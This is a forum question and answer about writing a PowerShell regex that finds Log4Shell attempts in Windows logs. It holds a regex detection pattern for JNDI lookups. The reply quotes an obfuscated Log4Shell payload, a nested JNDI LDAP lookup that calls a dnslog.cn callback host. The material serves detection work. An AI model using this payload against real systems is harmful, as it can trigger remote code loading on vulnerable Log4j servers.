Using PowerShell to check system logs for Log4Shell

I'm currently trying to check logs on different Windows machines to see whether any Log4Shell attacks were run against our systems. The groundwork is done and simple regex patterns can be checked. If I now use the known regex pattern for the Log4Shell attacks, PowerShell throws some "unrecognized grouping construct" errors.

The regex should look like this:

\${(\${(.*?:|.*?:.*?:-)('|"|`)*(?1)}*|[jndi:lapsrm]('|"|`)*}*){9,11}

This is the string I used for the regex in PowerShell, with the needed escape characters:

$RX = "\$`{(\$`{(.*?:|.*?:.*?:-)('|`"|``)*(?1)}*|[jndi:lapsrm]('|`"|``)*}*){9,11}"

Is there a mistake in my formatting? Or is there some weird error in PowerShell's regex recognition?

mfinni
I can't comment on your regex syntax, but this isn't sufficient. There are plenty of examples on the web of people using different escape characters to obfuscate the JNDI call: ${j${KPW:MnVQG:hARxLh:-n}d${cMrwww:aMHlp:LlsJc:Hvltz:OWeka:-i}:${jgF:IvdW:hBxXUS:-l}d${IGtAj:KgGmt:mfEa:-a}p://1639227068302CJEDj.kfvg5l.dnslog.cn/249540} https://databricks.com/blog/2021/12/13/log4j2-vulnerability-cve-2021-44228-research-and-assessment.html